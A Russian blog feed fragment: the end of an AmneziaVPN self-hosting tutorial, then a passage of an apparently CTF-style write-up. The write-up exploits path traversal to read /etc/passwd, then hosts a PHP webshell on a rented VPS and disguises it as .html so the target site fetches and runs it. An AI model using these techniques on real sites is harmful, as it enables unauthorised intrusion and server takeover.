  &lt;figure id=&quot;BRNb&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/52/ef/52ef3868-2fdc-4dbb-85fa-a8212d8dddce.png&quot; width=&quot;896&quot; /&gt;
    &lt;figcaption&gt;Открывшееся приложение&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;z0Go&quot;&gt;В открывшемся приложении жмем на кнопку начала и попадаем в главное меню:&lt;/p&gt;
  &lt;figure id=&quot;mns1&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7e/c4/7ec47871-588c-45aa-9832-4a3cf87fc363.png&quot; width=&quot;471&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;iw7F&quot;&gt;Здесь нам предлагается:&lt;/p&gt;
  &lt;ol id=&quot;e4We&quot;&gt;
    &lt;li id=&quot;g8AW&quot;&gt;Вставить купленный ключ на доступ к уже готовым VPN серверам от AmneziaVPN&lt;/li&gt;
    &lt;li id=&quot;9ire&quot;&gt;Подключиться к бесплатным и платным (если мы вставили ключ) серверам&lt;/li&gt;
    &lt;li id=&quot;e5lh&quot;&gt;Развернуть свой VPN-сервер (то чем мы сейчас и займемся)&lt;/li&gt;
    &lt;li id=&quot;XfTL&quot;&gt;Восстановить конфигурацию из резервной копии - на случай если у нас уже есть готовый сервер, и мы хотим перенести root-доступ на другое устройство&lt;/li&gt;
    &lt;li id=&quot;2lsq&quot;&gt;Подключиться к другому VPN-серверу, не AmneziaVPN - здесь мы можем подключиться прямо в этом приложении ко множеству других VPN-сервисов с помощью конфигурационного файла.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;J1WW&quot;&gt;И так, выбираем третий пункт - Self-Hosted VPN:&lt;/p&gt;
  &lt;figure id=&quot;XRt5&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5b/59/5b59a085-e2bd-46b0-a62f-67a362e87b3c.png&quot; width=&quot;460&quot; /&gt;
    &lt;figcaption&gt;Self-Hosted VPN&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;mzQG&quot;&gt;Здесь нам нужно вбить данные, которые мы получили, когда арендовали VPS. &lt;/p&gt;
  &lt;p id=&quot;g1kW&quot;&gt;Если мы введем неверные данные, то нам выдаст ошибку:&lt;/p&gt;
  &lt;figure id=&quot;sV0D&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/86/9f/869f7e0d-4009-4370-b46c-72e5b586208e.png&quot; width=&quot;455&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bHFu&quot;&gt;Что ж, тут я решил пойти не стандартно, и вместо пользователя root создал отдельного пользователя vpn, добавив его в группу sudo. Вам этого делать не обязательно, просто вставьте данные которые вам пришли после аренды сервера.&lt;/p&gt;
  &lt;figure id=&quot;Naqu&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ec/ce/ecceadd2-041a-4994-8a38-7a64d8ce14bf.png&quot; width=&quot;468&quot; /&gt;
    &lt;figcaption&gt;Проверяем работоспособность с другим пользователем&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;RBPe&quot;&gt;После успешного подключения нам сразу предложат установить VPN-сервис:&lt;/p&gt;
  &lt;figure id=&quot;v6Fo&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/96/14/96140487-3b7a-4090-ac4d-0940da512ba0.png&quot; width=&quot;459&quot; /&gt;
  &lt;/figure&gt;
  &lt;ol id=&quot;Wi5T&quot;&gt;
    &lt;li id=&quot;OM4L&quot;&gt;LOW - не проверял, вероятно установится что-то вроде OpenVPN сервера&lt;/li&gt;
    &lt;li id=&quot;2AWJ&quot;&gt;HIGH - здесь установится модифицированная версия WireGuard под названием AmneziaWG.&lt;/li&gt;
    &lt;li id=&quot;xyWz&quot;&gt;Выбрать VPN протокол - вот на него то мы и нажимаем.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;figure id=&quot;xxQH&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/19/9f/199fe3d1-00b7-4e1a-a6f4-6af10dfa3e98.png&quot; width=&quot;456&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;mJNZ&quot;&gt;Здесь нам выпадает список всех доступных для установки VPN сервисов. Лично я рекомендую &lt;a href=&quot;https://github.com/EvgenyNerush/easy-xray/blob/main/README.ru.md&quot; target=&quot;_blank&quot;&gt;XRay&lt;/a&gt; и &lt;a href=&quot;https://docs.amnezia.org/ru/documentation/protocols-info#:~:text=OpenVPN%20over%20Cloak%E2%80%8B,OpenVPN%20%D0%BE%D1%82%20%D0%BE%D0%B1%D0%BD%D0%B0%D1%80%D1%83%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B8%20%D0%B1%D0%BB%D0%BE%D0%BA%D0%B8%D1%80%D0%BE%D0%B2%D0%BE%D0%BA.&quot; target=&quot;_blank&quot;&gt;OpenVPN over Cloak&lt;/a&gt; как наиболее продвинутые технологии VPN, с имитацией живого web-трафика, защиты от активного зондирования.&lt;/p&gt;
  &lt;p id=&quot;knkg&quot;&gt;Для примера выбираю XRay:&lt;/p&gt;
  &lt;figure id=&quot;tzdN&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b4/05/b4052313-5a33-4514-b86a-443c4d0d9232.png&quot; width=&quot;455&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;qLmk&quot;&gt;Здесь можем выбрать свой порт, на который будет установлен данный контейнер. Я оставлю тот что мне предложила прога и нажму &lt;code&gt;install&lt;/code&gt;.&lt;/p&gt;
  &lt;p id=&quot;sHFx&quot;&gt;Теперь у нас пойдет процесс установки, а в терминале можно увидеть какие команды выполняются на сервере:&lt;/p&gt;
  &lt;figure id=&quot;MCCJ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/23/35/23359b79-afc6-4aa4-a5e6-ee2c44a28ce8.png&quot; width=&quot;1032&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;zIfO&quot;&gt;Наш эксперимент с другим пользователем провалился, выдав нам ошибку:&lt;/p&gt;
  &lt;figure id=&quot;ZMU5&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/10/2b/102b1f92-9e42-47dc-afe8-6a9576fb126b.png&quot; width=&quot;1038&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bye5&quot;&gt;Это существенный недостаток, однако, давайте вернемся назад и укажем логин и пароль от root пользователя:&lt;/p&gt;
  &lt;figure id=&quot;9KXE&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/05/d3/05d345c4-3666-444a-a1d4-869fdf3ab72e.png&quot; width=&quot;461&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;lvFA&quot;&gt;В этот раз у нас успешно запустился процесс установки, ждем окончания:&lt;/p&gt;
  &lt;figure id=&quot;ZI1c&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3e/94/3e94fa61-599a-4089-a3ef-34ec85ad987a.png&quot; width=&quot;1025&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dVNB&quot;&gt;По окончании нас будет ждать такое окно:&lt;/p&gt;
  &lt;figure id=&quot;CCJ3&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5d/97/5d97ab83-7333-4113-a62d-7ccd2590fa1f.png&quot; width=&quot;485&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;uRaj&quot;&gt;Кнопка подключения подключит нас к VPN.&lt;/p&gt;
  &lt;p id=&quot;wq8K&quot;&gt;Кнопка поделиться даст нам возможность дать доступ нашим товарищам, при этом не давая доступ на администрирование сервером.&lt;/p&gt;
  &lt;figure id=&quot;diMn&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/44/1d/441d730e-945c-48e2-bbe5-0fff477321c1.png&quot; width=&quot;461&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;aSpK&quot;&gt;В настройках можем сделать резервную копию, а также доустановить другие сервисы на сервер&lt;/p&gt;
  &lt;figure id=&quot;LZPj&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c6/94/c694ffa0-93b8-4df6-b3b3-f4000ae0e161.png&quot; width=&quot;482&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;QksV&quot;&gt;Для примера откроем первое окно Servers, выберем наш сервер и установим туда Tor сайт.&lt;/p&gt;
  &lt;figure id=&quot;14sH&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/18/ac/18ac39b4-6dff-4526-8012-09d96479d2e6.png&quot; width=&quot;470&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;FJC7&quot;&gt;После установки можем зайти и получить ссылку на наш сайт в darknet:&lt;/p&gt;
  &lt;figure id=&quot;AOML&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/38/9f/389f59ab-c5d4-4ad2-aa1c-da15dd8995a2.png&quot; width=&quot;465&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Oc24&quot;&gt;Если что работает на WordPress. Заходим по ссылке и устанавливаем сайт:&lt;/p&gt;
  &lt;figure id=&quot;o90X&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a8/e9/a8e940d5-75be-4cc4-acce-b51babdd8078.png&quot; width=&quot;1909&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;LOxo&quot;&gt;В окне управления можем перезапустить наш сервер, удалить все сервисы со следами с нашего сервера, и удалить сервер из приложения (сам сервер останется):&lt;/p&gt;
  &lt;figure id=&quot;DvHB&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9c/12/9c127408-44c4-43aa-af19-874287a83102.png&quot; width=&quot;477&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Yyhe&quot;&gt;Ну вот собственно и всё. VPN получен, остальные функции оставлю вам на самостоятельное изучение. Продукт годный и лично мне за его удобства очень понравился. Функции реализованы за счёт готовых docker контейнеров.&lt;/p&gt;
  &lt;figure id=&quot;Vipp&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a5/0d/a50ddaf6-a81e-4298-b9c3-4d731fb30e8e.png&quot; width=&quot;1825&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4KKI&quot;&gt;Тестируем на whoer.net наш vpn пока не добьемся желаемого результата. Для этого меняем доступные VPN-сервисы и VPS провайдеров, а также расположение сервера и настройку своей системы (или меняем систему в целом, &lt;a href=&quot;https://www.digi77.com/linux-kodachi/&quot; target=&quot;_blank&quot;&gt;например&lt;/a&gt;).&lt;/p&gt;
  &lt;figure id=&quot;fKCe&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/09/13/09132b71-e73f-458f-94b8-f3dbfe04af0d.png&quot; width=&quot;1436&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;VJTK&quot;&gt;Выводы&lt;/h3&gt;
  &lt;p id=&quot;xAPA&quot;&gt;AmneziaVPN отлично подойдет тем, кто не прошарен в IT сфере или просто не хочет особо заморачиваться с развертыванием столь обывательских инструментов.&lt;/p&gt;
  &lt;p id=&quot;ZmdV&quot;&gt;Данное решение позволяет автоматизировано развернуть большое количество сервисов, однако не даёт возможности гибкой настройки и подключения к серверу не под root пользователем - что значительный минус.&lt;/p&gt;
  &lt;p id=&quot;wQPw&quot;&gt;Сервисы упакованы в docker контейнеры. Такая изоляция гарантирует дополнительную безопасность.&lt;/p&gt;
  &lt;p id=&quot;9Lvr&quot;&gt;Как итог - годная штука для тех кто не силён в самостоятельном развертывании сервисов на Linux серверах, а также для тех, кто хочет изучить и быть может даже помочь в разработки подобных решений.&lt;/p&gt;
  &lt;figure id=&quot;EUTb&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/de/7e/de7e9a93-f052-48fb-bf38-ed08c12a2885.png&quot; width=&quot;1533&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ZJfZ&quot;&gt;Благодарю за прочтение статьи.&lt;/p&gt;

</content></entry><entry><id>hunterghoul_team:path-traversal</id><link rel="alternate" type="text/html" href="https://teletype.in/@hunterghoul_team/path-traversal?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hunterghoul_team"></link><title>Write-up - эксплуатируем Path Traversal и уязвимость command injection</title><published>2024-11-03T19:38:17.040Z</published><updated>2024-11-05T21:50:39.685Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/1a/9a/1a9ad793-69d2-4107-a181-39abb499e3a7.png"></media:thumbnail><category term="hacking" label="Hacking"></category><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/c7/1d/c71dc56d-398b-4191-8e32-fe8d0948a92a.png&quot;&gt;Всем привет! Сегодня мы будем ломать сайт приватного канала, который выглядит вот так:</summary><content type="html">
  &lt;h3 id=&quot;id5X&quot;&gt;Дисклеймер&lt;/h3&gt;
  &lt;p id=&quot;CNfD&quot;&gt;Информация ниже предоставлена в ознакомительных целях. Ответственность за все действия несёте исключительно вы. Автор настоятельно рекомендует не нарушать действующие законодательства стран и использовать полученную информацию в образовательных целях.&lt;/p&gt;
  &lt;h3 id=&quot;zOEM&quot;&gt;Введение&lt;/h3&gt;
  &lt;p id=&quot;GiEd&quot;&gt;Всем привет! Сегодня мы будем ломать сайт приватного канала, который выглядит вот так:&lt;/p&gt;
  &lt;figure id=&quot;wkCB&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c7/1d/c71dc56d-398b-4191-8e32-fe8d0948a92a.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Стартовая страница сайта&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;hIhu&quot;&gt;Начало анализа web-приложения&lt;/h3&gt;
  &lt;p id=&quot;RTGL&quot;&gt;Первое, с чего начинается взлом сайта - проверка его функционала, то, с чем мы будем в последующем работать. Так что давайте как тут и задумано, попробуем вставить URL какой-нибудь картинки из интернета.&lt;/p&gt;
  &lt;figure id=&quot;55hy&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bb/70/bb70782c-aa8b-4b2d-b561-db741af1efdd.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;&amp;quot;Картинка&amp;quot; из интернета&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;hBkL&quot;&gt;Как видим, вместо отображения картинки, нам отобразилась её внутренность, т.е. как бы выполнилась команда cat (прочтение содержимого файла). Интересный момент, стоит обратить на него внимание.&lt;/p&gt;
  &lt;p id=&quot;2iOf&quot;&gt;P. S. кстати, если бы мы вставили ссылку какого-то сайта, то у нас отобразился сайт, типо как в &lt;code&gt;&amp;lt;iframe&amp;gt;&lt;/code&gt; html теге. Это важно, так как это нам даёт понять, что сервер принимать в качестве url не только адрес картинки, но и любой другой url адрес, что может позволить нам выполнить атаку типа &lt;a href=&quot;https://blog.skillfactory.ru/glossary/csrf/&quot; target=&quot;_blank&quot;&gt;CSRF&lt;/a&gt; (затрудняюсь ответить правильное название в данном случае).&lt;/p&gt;
  &lt;p id=&quot;Uu6X&quot;&gt;Теперь обращаем внимание на то, что наша ссылка в URL браузера вставилась после вызова php функции &lt;code&gt;?file_url&lt;/code&gt; (в php, функции следуют после символа ?). Давайте попробуем туда написать вместо URL картинки например слово &lt;code&gt;test&lt;/code&gt;.&lt;/p&gt;
  &lt;figure id=&quot;jBtJ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3f/a1/3fa14896-8e9d-4e2a-9f10-61f136b18abb.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Вписываем незапланнированный пользовательский ввод&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;r1wM&quot;&gt;Видим что наш запрос успешно выполнен, ошибок нет. Возможно, стоит попробовать ввести какую-то команду? Но прежде мы с вами погрузимся в небольшую теорию...&lt;/p&gt;
  &lt;h3 id=&quot;weNX&quot;&gt;Краткий экскурс в мир Линуса Торвальдса&lt;/h3&gt;
  &lt;p id=&quot;cn62&quot;&gt;В Linux системах есть встроенная программа - cd (change directory, от англ. &amp;quot;выбрать папку&amp;quot;).&lt;/p&gt;
  &lt;p id=&quot;CdLq&quot;&gt;Суть данной (как и остальных, но об этом как-нибудь в отдельной статье по линукс) программы в том, чтобы просто перемещать нас по нужным папкам.&lt;/p&gt;
  &lt;p id=&quot;ydmI&quot;&gt;Как происходит выбор папки.&lt;/p&gt;
  &lt;p id=&quot;qXj1&quot;&gt;В терминале необходимо прописать команду:&lt;/p&gt;
  &lt;p id=&quot;tOFu&quot;&gt;&lt;code&gt;cd путь_до_папки&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;ahKv&quot;&gt;А теперь внимание - существует &lt;u&gt;абсолютный&lt;/u&gt; и &lt;u&gt;относительный&lt;/u&gt; путь.&lt;/p&gt;
  &lt;p id=&quot;GLBJ&quot;&gt;Абсолютный путь - это когда мы начинаем с корневой директории (как правило с самой первой директории на жестком диске) и спускаемся в нам нужную.&lt;/p&gt;
  &lt;p id=&quot;zOOw&quot;&gt;Например:&lt;/p&gt;
  &lt;p id=&quot;2VxP&quot;&gt;&lt;code&gt;cd /home/user1/Desktop/top_secret/&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;elJa&quot;&gt;В данном случае мы с вами после запуска программы cd переходим с помощью ввода / в корневой каталог. Затем вводим там папку home и с помощью / заходим уже в неё. Таким образом доходим до нужной директории, в конце ставим / чтобы выбрать её и готово. Мы с вами попадаем в папку &lt;code&gt;top_secret&lt;/code&gt; пользователя &lt;code&gt;user1&lt;/code&gt; и можем делать с её содержимым что хотим.&lt;/p&gt;
  &lt;p id=&quot;Ecf2&quot;&gt;Относительный путь - это когда мы хотим переместиться на директорию выше или во вложенную директорию относительно той, в которой мы сейчас находимся&lt;/p&gt;
  &lt;p id=&quot;Ra0x&quot;&gt;Например:&lt;/p&gt;
  &lt;p id=&quot;7Hch&quot;&gt;cd ./lib/tools/&lt;/p&gt;
  &lt;p id=&quot;3ayk&quot;&gt;cd ../magic/env/&lt;/p&gt;
  &lt;p id=&quot;8eEp&quot;&gt;cd ../../home/user2/test/&lt;/p&gt;
  &lt;p id=&quot;WKq0&quot;&gt;Как вы уже заметили, здесь появились некие точки (одна и две). Что значит этот айтишный заговор? А значит он следующее: одна точка - это текущая папка; две точки - это папка уровнем выше, т.е. как бы вернуться на папку назад, в которую вложена наша.&lt;/p&gt;
  &lt;p id=&quot;s1Vu&quot;&gt;Таким образом слеш &amp;lt;/&amp;gt; отделяет папки друг от друга, выполняет функцию перехода в папку. Знаки точек выполняют функцию ссылок, одна точка - текущая папка; две точки - папка повыше.&lt;/p&gt;
  &lt;p id=&quot;yNIr&quot;&gt;И так, возвращаемся к нашему сайту.&lt;/p&gt;
  &lt;figure id=&quot;JmnX&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b6/85/b685cf1d-bba9-4f68-a61c-e839a467a45f.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Просматриваем файл с пользователями linux&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;F5Vb&quot;&gt;Здесь мы пошли на хитрость и попробовали открыть файл &lt;code&gt;passwd&lt;/code&gt; с пользователями, который по умолчанию хранится в линуксах в папке &lt;code&gt;/etc/&lt;/code&gt;.&lt;/p&gt;
  &lt;p id=&quot;lIZp&quot;&gt;В данном случае методом тыка мы обнаружили уязвимость Path traversal. Path traversal - это уязвимость приложений, заключающаяся в возможности выхода за пределы директории и чтения произвольных файлов на сервере.&lt;/p&gt;
  &lt;p id=&quot;X2FK&quot;&gt;Читать этот файл (опять же как правило) могут все, и важный момент - мы  используем именно относительный путь, поскольку абсолютный как правило не сработает по ряду определенных причин.&lt;/p&gt;
  &lt;p id=&quot;tjtR&quot;&gt;По сути то что нам открылось содержимое файла уже говорит о многом. В Bug Bounty нам бы уже дали заслуженную денюжку и мы сидели пили чаёк. Но мы отбитые хацкеры, потому нам интересен процесс взлома, а не баги и уязвимости. Продолжаем ломать &lt;s&gt;голову&lt;/s&gt; систему.&lt;/p&gt;
  &lt;h3 id=&quot;Fd9E&quot;&gt;Payload - ищем способ доставки полезной нагрузки&lt;/h3&gt;
  &lt;p id=&quot;9eUs&quot;&gt;И так, попробуем вместо картинки заслать сайту специальный webshell. Лично я не силён в познаниях ЯП PHP, так что, воспользуемся &lt;a href=&quot;https://t.me/hunterghoulchat/32&quot; target=&quot;_blank&quot;&gt;готовым&lt;/a&gt; вариантом из моего Telegram &lt;a href=&quot;https://t.me/hunterghoul_team&quot; target=&quot;_blank&quot;&gt;канала&lt;/a&gt;. Это простой и прикольный php webshell, который позволит нам выполнить код прямо на странице сайта. &lt;/p&gt;
  &lt;p id=&quot;uHqd&quot;&gt;Хорошо, у нас есть готовый payload, теперь его нужно как-то доставить. В нашем случае сайт принимает на ввод URL адрес. Значит нам нужно публично выложить наш payload в интернет и получить на него прямую ссылку (вы же помните про NAT из &lt;a href=&quot;https://t.me/hunterghoul_team/16&quot; target=&quot;_blank&quot;&gt;прошлой статьи&lt;/a&gt;, так что придется похимичить).&lt;/p&gt;
  &lt;p id=&quot;q5Ug&quot;&gt;Здесь можно было бы попробовать подходящие файлообменники. Можно было бы попробовать с нашей системы дать публичную ссылку с помощью, например, программы &lt;a href=&quot;https://ngrok.com/&quot; target=&quot;_blank&quot;&gt;ngrok&lt;/a&gt;. Но мы с вами поступим другим способом - арендуем VPS.&lt;/p&gt;
  &lt;figure id=&quot;XSNz&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/da/94/da9409b8-ea4b-4ccc-bf91-ae63a78c04fc.png&quot; width=&quot;1095&quot; /&gt;
    &lt;figcaption&gt;Арендованный VPS&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Xkvl&quot;&gt;Итак, дедик (dedicated server, от англ. выделенный сервер) мы с вами взяли, подключаемся к нему по ssh.&lt;/p&gt;
  &lt;p id=&quot;7JFc&quot;&gt;Подключившись, установим на него web-сервер, который бы позволил нам получить URL адрес на наш payload. Например Apache.&lt;/p&gt;
  &lt;figure id=&quot;8xo6&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/de/76/de764ee0-f300-4dfb-9009-3f60c2f35fbf.png&quot; width=&quot;812&quot; /&gt;
    &lt;figcaption&gt;Устанавливаем apache2&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Ez1u&quot;&gt;Команда для установки простая: &lt;code&gt;apt install apache2&lt;/code&gt;.&lt;/p&gt;
  &lt;p id=&quot;JImU&quot;&gt;После этого файлы нашего сайта будут располагаться в папке &lt;code&gt;/var/www/html/&lt;/code&gt;.&lt;/p&gt;
  &lt;p id=&quot;KgoY&quot;&gt;Переходим туда, удаляем дефолтные файлы.&lt;/p&gt;
  &lt;p id=&quot;FCJR&quot;&gt;Создаем новый файл, назовем его например webshell.php и копируем туда содержимое того, что вы скачали выше с моего канала.&lt;/p&gt;
  &lt;figure id=&quot;Qgt0&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/18/df/18dfe99f-09e3-4dc2-bc69-4d26d2fb034e.png&quot; width=&quot;792&quot; /&gt;
    &lt;figcaption&gt;Создаём файл webshell.php&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;lL91&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b4/52/b4524e6f-7c76-4090-a696-7d19072125ab.png&quot; width=&quot;803&quot; /&gt;
    &lt;figcaption&gt;Вставляем содержимое нашего payload в файл&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;vr8Q&quot;&gt;Команда простая: &lt;code&gt;nano webshell.php&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;NSpg&quot;&gt;Далее просто ctrl+c, ctrl+v. И для того чтобы сохранить пишем ctrl+o, подтверждаем запись данных нажав на Y. После этого выходим из редактора нажав на ctrl+x. Подробнее как пользоваться редактором nano можете почитать &lt;a href=&quot;https://losst.pro/tekstovyj-redaktor-nano-v-linux-dlya-novichkov&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;J6RI&quot;&gt;Так как мы создали этот файл по пути &lt;code&gt;/var/www/html/webshell.php&lt;/code&gt;, то он теперь у нас доступен в интернете по адресу &lt;code&gt;http://ip_сервера/webshell.php&lt;/code&gt;.&lt;/p&gt;
  &lt;figure id=&quot;bxbX&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2a/c4/2ac4e073-cd8b-4b11-b561-b9ff98d9b066.png&quot; width=&quot;1918&quot; /&gt;
    &lt;figcaption&gt;Проверяем доступность файла&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;NrIA&quot;&gt;Перейдя видим, что наш шелл (shell, от англ. оболочка) работает. Если бы на нашем сервере был установлен php, то мы смогли бы выполнять linux команды прямо здесь, введя их в строку и нажав на &lt;code&gt;Execute&lt;/code&gt; (от англ. выполнить). А в графе &lt;code&gt;Output&lt;/code&gt; (от англ. вывод) появился бы вывод результата выполненной команды, в случае, если эта команда успешно выполнилась.&lt;/p&gt;
  &lt;p id=&quot;ARq0&quot;&gt;Что ж, остаётся только кинуть ссылку на наш атакуемый сайт и кайфануть от сработавшей оболочки, и, о нет...&lt;/p&gt;
  &lt;figure id=&quot;KDxv&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/74/be/74be3aff-397d-4047-825f-42d788be0ee7.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Error&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;D85g&quot;&gt;Оказывается .php файлы наш сайт не хочет принимать. Что ж, в таком случае попробуем снова пойти на хитрость и переименуем наш файл с .php на .html расширение.&lt;/p&gt;
  &lt;figure id=&quot;P7l5&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3d/7e/3d7e0b52-6262-4039-9af8-8ad5eed011a4.png&quot; width=&quot;807&quot; /&gt;
    &lt;figcaption&gt;Переименовываем файл&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;jblb&quot;&gt;Делается это командой: &lt;code&gt;mv webshell.php webshell.html&lt;/code&gt;.&lt;/p&gt;
  &lt;p id=&quot;DXn3&quot;&gt;Вообще команда mv служит для перемещения файлов, но также ей таким образом можно и переименовать файл как в нашем случае, но об этом как-нибудь в другой раз.&lt;/p&gt;
  &lt;p id=&quot;OoYs&quot;&gt;Пробуем ещё раз:&lt;/p&gt;
  &lt;figure id=&quot;7DHq&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ad/aa/adaa4128-c8e6-40ba-b386-a94bafe1bf0f.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Успех&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ZIRj&quot;&gt;И о да, оболочка запустилась.&lt;/p&gt;
  &lt;p id=&quot;F5WB&quot;&gt;Вы вероятно можете задаться вопросом - а как мы запустили php файл переименованный в html???&lt;/p&gt;
  &lt;p id=&quot;9oer&quot;&gt;Всё просто - при определенной настройке web-сервера он начинает считывать html файлы как php файлы. Сделано это для того чтобы сервер мог выполнять встроенный в html код ЯП PHP. В нашем случае такая настройка сервера привела нас к возможности выполнить свой произвольный код.&lt;/p&gt;
  &lt;p id=&quot;E6HG&quot;&gt;Теперь давайте выполним пару команд и получим флаг.&lt;/p&gt;
  &lt;figure id=&quot;q2ce&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e3/94/e394e5ec-a6cb-42e6-9499-4737ba66b323.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;PWD - где мы?&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;OcCH&quot;&gt;Узнаем в какой мы сейчас папке с помощью команды: &lt;code&gt;pwd&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;jbsF&quot;&gt;Теперь с помощью команды &lt;code&gt;ls&lt;/code&gt; посмотрим список файлов в нашей текущей папке и команды &lt;code&gt;cat&lt;/code&gt; прочитаем их содержимое:&lt;/p&gt;
  &lt;figure id=&quot;Fopc&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b3/89/b389cfa5-17f0-4b94-abd8-23f00d35e9fb.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Команда ls&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;UKgG&quot; class=&quot;m_column&quot;&gt;
